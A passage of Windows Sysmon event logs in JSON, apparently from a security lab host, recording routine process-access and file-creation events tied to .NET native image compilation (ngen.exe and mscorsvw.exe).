C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:15.086","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21FF-5F25-0000-0010FBC90A00}","TargetProcessId":"2972","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:16","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6765,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:16.054\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2200-5F25-0000-001092CF0A00}\r\nTargetProcessId: 3424\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:16.054","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2200-5F25-0000-001092CF0A00}","TargetProcessId":"3424","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:16","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6766,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:16.054\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2200-5F25-0000-001092CF0A00}\r\nTargetProcessId: 3424\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:16.054","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2200-5F25-0000-001092CF0A00}","TargetProcessId":"3424","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:16","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6767,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:16.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2200-5F25-0000-001092CF0A00}\r\nTargetProcessId: 3424\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:16.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2200-5F25-0000-001092CF0A00}","TargetProcessId":"3424","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6768,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:04:31.070\r\nProcessGuid: {41C8662E-2200-5F25-0000-001092CF0A00}\r\nProcessId: 3424\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\d60-0\\System.ServiceModel.dll\r\nCreationUtcTime: 2020-08-01 08:04:31.070","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:04:31.070","ProcessGuid":"{41C8662E-2200-5F25-0000-001092CF0A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\d60-0\\System.ServiceModel.dll","CreationUtcTime":"2020-08-01 08:04:31.070","EventReceivedTime":"2020-08-01 08:04:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6769,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:31.351\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21F4-5F25-0000-0010FD7F0A00}\r\nTargetProcessId: 4028\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:31.351","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21F4-5F25-0000-0010FD7F0A00}","TargetProcessId":"4028","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6770,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:31.351\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21F4-5F25-0000-0010FD7F0A00}\r\nTargetProcessId: 4028\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:31.351","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21F4-5F25-0000-0010FD7F0A00}","TargetProcessId":"4028","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6771,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:31.367\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-220F-5F25-0000-0010C2DB0A00}\r\nTargetProcessId: 4028\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:31.367","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-220F-5F25-0000-0010C2DB0A00}","TargetProcessId":"4028","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6772,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:31.789\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21F5-5F25-0000-0010D2840A00}\r\nTargetProcessId: 4916\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:31.789","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21F5-5F25-0000-0010D2840A00}","TargetProcessId":"4916","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
